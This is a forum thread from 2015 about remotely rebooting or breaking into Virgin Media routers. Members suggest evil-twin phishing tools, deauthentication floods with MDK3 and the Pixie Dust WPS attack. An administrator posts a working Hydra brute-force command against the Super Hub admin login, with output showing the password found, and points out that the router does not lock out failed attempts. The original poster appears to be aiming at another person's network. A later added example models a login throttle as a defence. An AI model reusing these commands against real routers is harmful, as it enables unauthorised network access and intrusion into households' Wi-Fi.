Code to reboot Virgin Media Router


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Mar 2015 @ 15:59:17

I was reading this interesting attack.

LINK


The guy said ...



Using just a few lines of code, it's possible to force the router to reboot remotely.


I am unsure how this is possible when the attacker does not yet have access to the network or the admin panel.

Anyone know if this is true or better still, anyone have the code ???


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

hacker-zone

Status: Banned
Joined: Wed, 12 Nov 2014
Posts: 90
Team:
Reputation: 90 Reputation
Offline
Mon, 02 Mar 2015 @ 19:18:03

WARNING! User is BANNED and maybe a SCAMMER.

Virgin were made aware of this flaw in May of last year.
A lot has been spoken about it but there hasn't been any sign of code written anywhere.
Would you not get the same result with WifiPhisher or Linset?

All you need to do is deauth the router and set up an evil twin.


BTC: 1JAc5xbxwfUj4Lo2RAtmYPbkXntknsJNwf

Hash-IT
Mon, 02 Mar 2015 @ 21:46:42

I just cannot think how he can claim to be able to power off and re-boot a router remotely, without having the WPA key or LAN access.

Yes, those 2 scripts look good, thanks for suggesting them. Unfortunately they require a gullible victim; my "test subject" is not so gullible.



hacker-zone
Mon, 02 Mar 2015 @ 21:53:17


You might be able to cause the router to reboot by overloading it with requests, I know this was possible a long time ago using MDK3.



Hash-IT
Mon, 02 Mar 2015 @ 21:56:15

Really, that is surprising.

Was this just Virgin routers ?

I wonder how he would know when his 7 seconds has started if he is simply brute forcing deauths ?

Ohh you have got me interested now.



hacker-zone
Mon, 02 Mar 2015 @ 23:43:43


Have you heard much about the Pixie Dust attack to crack the WPS key offline?
I hear it could be coming to Kali Linux soon.



Hash-IT
Mon, 02 Mar 2015 @ 23:59:40

"Pixie Dust" LOL. No, I haven't heard about that until now. Who comes up with these names?



hacker-zone
Tue, 03 Mar 2015 @ 00:06:49


Dominique Bongard.
From what I have read it looks as though we are able to capture packets to use offline and decrypt them to get the 2 separate halves of the WPS key.
There is talk about implementing this tool into reaver.



Hash-IT
Tue, 03 Mar 2015 @ 00:16:33

Awesome, that is going to be brutal !

Link to his PDF.

https://passwordscon.org/wp-content/uploads/2014/08/Dominique_Bongard.pdf



Milzo
Administrator
Status: Trusted
Joined: Sat, 29 Dec 2012
Posts: 3095
Team:
Reputation: 5065 Reputation
Online
Tue, 03 Mar 2015 @ 10:59:23

Code:
Virgin Super Hub 1 | LAN only | Hydra Brute Force

or over WAN if remote management has been enabled on port 8080 (rare)

POC (Permission Granted)

hydra -l admin -P ~/Dropbox/sample-pass.txt -f -V -t 4 192.168.0.1 http-post-form "/goform/VmLogin:VmLoginUsername=^USER^&VmLoginPassword=^PASS^&VmLoginErrorCode=0&VmChangePasswordHint=0:S=home.asp"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-03 10:35:34
[DATA] max 4 tasks per 1 server, overall 64 tasks, 141 login tries (l:1/p:141), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "pxltart13" - 1 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "bob13ism" - 2 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "K@ila$h" - 3 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "esseufoma" - 4 of 141 [child 3]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "USAsvc1" - 5 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "d408t226" - 6 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "chloeak0" - 7 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "al1th1in" - 8 of 141 [child 3]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "Caetey" - 9 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "Bcoop516" - 10 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "viper0023" - 11 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "saipmmyi" - 12 of 141 [child 3]
[80][http-post-form] host: 192.168.0.1   login: admin   password: viper0023
[STATUS] attack finished for 192.168.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-03 10:35:38

----
The router doesn't lock you out after failed attempts, unlike BTHub 3/4/5, with 1 minute increments after each failed attempt once triggered.

Get up and running with hydra:

Code:
cd;sudo apt-get remove hydra hydra-gtk;sudo apt-get install git; git clone https://github.com/vanhauser-thc/thc-hydra.git;cd thc-hydra;./configure && make;sudo make install

----

Need to try and emulate the 7 second flaw if it still exists. They've had nearly a year to patch it with firmware updates.


Powershell script to reboot/restore router
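
The contrast drawn in the post above (no lockout on the Super Hub, versus a lockout that grows by a minute per failed attempt on the BTHub) can be modelled as a login throttle. This is an added example, not part of the original thread and not any router's firmware; the class and function names, the three free attempts, the one-hour cap and the 0.25 s per attempt are assumptions chosen for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class LoginThrottle:
    free_attempts: int = 3   # assumed: the lockout triggers on this failure
    step_seconds: int = 60   # each further failure adds one more minute
    max_lock: int = 3600     # assumed cap so the owner is never locked out for good
    # Keyed per account, not per source address, so changing the source
    # address does not reset the counter.
    _state: dict = field(default_factory=dict)  # account -> (failures, locked_until)

    def retry_at(self, account):
        """Earliest time at which the next attempt will be evaluated."""
        return self._state.get(account, (0, 0.0))[1]

    def attempt(self, account, password_ok, now):
        """Return True only if the login is accepted at time `now`."""
        failures, locked_until = self._state.get(account, (0, 0.0))
        if now < locked_until:
            return False  # rejected without even checking the password
        if password_ok:
            self._state.pop(account, None)
            return True
        failures += 1
        over = failures - self.free_attempts + 1
        lock = min(over * self.step_seconds, self.max_lock) if over > 0 else 0
        self._state[account] = (failures, now + lock)
        return False


def seconds_until_guess(throttle, position, seconds_per_try=0.25):
    """Time at which guess number `position` (1-based) of a wordlist is
    evaluated, for a client that retries as soon as the throttle allows."""
    now = 0.0
    for n in range(1, position + 1):
        now = max(now, throttle.retry_at("admin"))
        if throttle.attempt("admin", n == position, now):
            return now
        now += seconds_per_try
    raise AssertionError("unreachable: the last guess is always the correct one")


if __name__ == "__main__":
    no_lockout = LoginThrottle(free_attempts=10**6)  # behaves like the Super Hub
    print("no lockout, guess 11 lands at", seconds_until_guess(no_lockout, 11), "s")
    print("with lockout, guess 11 lands at", seconds_until_guess(LoginThrottle(), 11), "s")
```

With these assumed values the eleventh guess, which succeeded within seconds in the run above, is not evaluated until about 36 minutes in.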





Hash-IT
Fri, 06 Mar 2015 @ 19:14:23

Thanks for your help user. Nice find with the PowerShell script.

After much reading, I think the only way he must be doing this is with MDK3, as hacker-zone mentioned.

It does seem from posts on other forums that some Virgin routers do indeed shut down and restart their wifi if they become overwhelmed by MDK3.

I think logging in to the Admin page would have to be scripted to be fast enough to be within the 7 seconds required to view the password.

Interesting attack

